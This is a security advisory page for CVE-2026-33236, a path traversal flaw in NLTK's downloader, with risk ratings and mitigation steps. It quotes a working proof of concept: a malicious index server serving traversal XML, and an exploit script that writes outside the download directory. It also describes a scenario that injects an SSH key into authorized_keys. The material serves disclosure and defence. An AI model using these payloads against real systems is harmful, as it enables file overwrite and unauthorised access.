NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.
What is the risk?
High risk for organizations running NLP pipelines, training infrastructure, or shared research environments. CVSS 8.1 is justified: network-accessible, low complexity, no privileges required, and a working PoC exists. The primary exploitation constraint is attacker control of the NLTK index server—achievable via MitM on HTTP traffic, BGP/DNS hijack, or social engineering ML engineers into using malicious custom URLs. Cloud ML environments with unfiltered outbound HTTP (SageMaker, Vertex AI, Azure ML) are particularly exposed. EPSS is low (0.00043) indicating no observed exploitation yet, but the public PoC significantly lowers the barrier to entry.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| nltk | pip | <= 3.9.2 | No patch |
Do you use nltk? You're affected.
How severe is it?
What is the attack surface?
What should I do?
7 steps-
Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (
pip show nltk). -
Patch: No official patched version released as of CVE publication—monitor https://github.com/nltk/nltk for release.
-
Workaround (preferred): Pre-download all required corpora and bake into container images; disable runtime NLTK downloads in production entirely.
-
Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines.
-
Audit: Search codebase for
Downloader(server_index_url=with non-official URLs—treat as critical finding requiring immediate remediation. -
Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages).
-
Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-33236?
NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.
Is CVE-2026-33236 actively exploited?
No confirmed active exploitation of CVE-2026-33236 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-33236?
1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`). 2. Patch: No official patched version released as of CVE publication—monitor https://github.com/nltk/nltk for release. 3. Workaround (preferred): Pre-download all required corpora and bake into container images; disable runtime NLTK downloads in production entirely. 4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines. 5. Audit: Search codebase for `Downloader(server_index_url=` with non-official URLs—treat as critical finding requiring immediate remediation. 6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages). 7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
What systems are affected by CVE-2026-33236?
This vulnerability affects the following AI/ML architecture patterns: NLP training pipelines, data preprocessing pipelines, CI/CD ML pipelines, Jupyter notebook environments, containerized ML workloads.
What is the CVSS score for CVE-2026-33236?
CVE-2026-33236 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.40%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0008.002 Domains AML.T0010.001 AI Software AML.T0011 User Execution Compliance Controls Affected
What are the technical details?
Original Advisory
## Vulnerability Description The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to: 1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system 2. **Arbitrary File Creation**: Create arbitrary files 3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.) ## Vulnerability Principle ### Key Code Locations **1. XML Parsing Without Validation** (`nltk/downloader.py:253`) ```python self.filename = os.path.join(subdir, id + ext) ``` - `subdir` and `id` are directly from XML attributes without any validation **2. Path Construction Without Checks** (`nltk/downloader.py:679`) ```python filepath = os.path.join(download_dir, info.filename) ``` - Directly uses `filename` which may contain path traversal **3. Unrestricted Directory Creation** (`nltk/downloader.py:687`) ```python os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True) ``` - Can create arbitrary directories outside the download directory **4. File Writing Without Protection** (`nltk/downloader.py:695`) ```python with open(filepath, "wb") as outfile: ``` - Can write to arbitrary locations in the file system ### Attack Chain ``` 1. Attacker controls remote XML index server ↓ 2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../> ↓ 3. Victim executes: downloader.download('passwd') ↓ 4. Package.fromxml() creates object, filename = "../../etc/passwd.zip" ↓ 5. _download_package() constructs path: download_dir + "../../etc/passwd.zip" ↓ 6. os.makedirs() creates directory: download_dir + "../../etc" ↓ 7. open(filepath, "wb") writes file to /etc/passwd.zip ↓ 8. System file is overwritten! ``` ## Impact Scope 1. **System File Overwrite** ## Reproduction Steps ### Environment Setup 1. Install NLTK ```bash pip install nltk ``` 2. Prepare malicious server and exploit script (see PoC section) ### Reproduction Process **Step 1: Start malicious server** ```bash python3 malicious_server.py ``` **Step 2: Run exploit script** ```bash python3 exploit_vulnerability.py ``` **Step 3: Verify results** ```bash ls -la /tmp/test_file.zip ``` ## Proof of Concept ### Malicious Server (malicious_server.py) ```python #!/usr/bin/env python3 """Malicious HTTP Server - Provides XML index with path traversal""" import os import tempfile import zipfile from http.server import HTTPServer, BaseHTTPRequestHandler # Create temporary directory server_dir = tempfile.mkdtemp(prefix="nltk_malicious_") # Create malicious XML (contains path traversal) malicious_xml = """<?xml version="1.0"?> <nltk_data> <packages> <package id="test_file" subdir="../../../../../../../../../tmp" url="http://127.0.0.1:8888/test.zip" size="100" unzipped_size="100" unzip="0"/> </packages> </nltk_data> """ # Save files with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f: f.write(malicious_xml) with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf: zf.writestr("test.txt", "Path traversal attack!") # HTTP Handler class Handler(BaseHTTPRequestHandler): def do_GET(self): if self.path == '/malicious_index.xml': self.send_response(200) self.send_header('Content-type', 'application/xml') self.end_headers() with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f: self.wfile.write(f.read()) elif self.path == '/test.zip': self.send_response(200) self.send_header('Content-type', 'application/zip') self.end_headers() with open(os.path.join(server_dir, 'test.zip'), 'rb') as f: self.wfile.write(f.read()) else: self.send_response(404) self.end_headers() def log_message(self, format, *args): pass # Start server if __name__ == "__main__": port = 8888 server = HTTPServer(("0.0.0.0", port), Handler) print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml") print("Press Ctrl+C to stop") try: server.serve_forever() except KeyboardInterrupt: print("\nServer stopped") ``` ### Exploit Script (exploit_vulnerability.py) ```python #!/usr/bin/env python3 """AFO Vulnerability Exploit Script""" import os import tempfile def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"): download_dir = tempfile.mkdtemp(prefix="nltk_exploit_") print(f"Download directory: {download_dir}") # Exploit vulnerability from nltk.downloader import Downloader downloader = Downloader(server_index_url=server_url, download_dir=download_dir) downloader.download("test_file", quiet=True) # Check results expected_path = "/tmp/test_file.zip" if os.path.exists(expected_path): print(f"\n✗ Exploit successful! File written to: {expected_path}") print(f"✗ Path traversal attack successful!") else: print(f"\n? File not found, download may have failed") if __name__ == "__main__": exploit() ``` ### Execution Results ``` ✗ Exploit successful! File written to: /tmp/test_file.zip ✗ Path traversal attack successful! ```
Exploitation Scenario
An adversary targeting an organization's NLP training pipeline identifies that the pipeline downloads NLTK resources at runtime against an HTTP (non-TLS) index server. The adversary performs a DNS hijack or BGP prefix hijack against the NLTK data hostname, redirecting index requests to a controlled malicious server. The malicious server returns a crafted XML with subdir='../../../.ssh' and id='authorized_keys'. When the nightly training job executes `nltk.download('punkt')`, NLTK constructs the path `download_dir + '../../../.ssh/authorized_keys.zip'`, creates the directory, and writes the attacker's crafted archive. After extraction, the attacker's SSH public key is present in authorized_keys—granting persistent, passwordless access to the ML training server, which typically holds sensitive training data, model artifacts, and credentials for internal APIs and data stores.
Weaknesses (CWE)
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution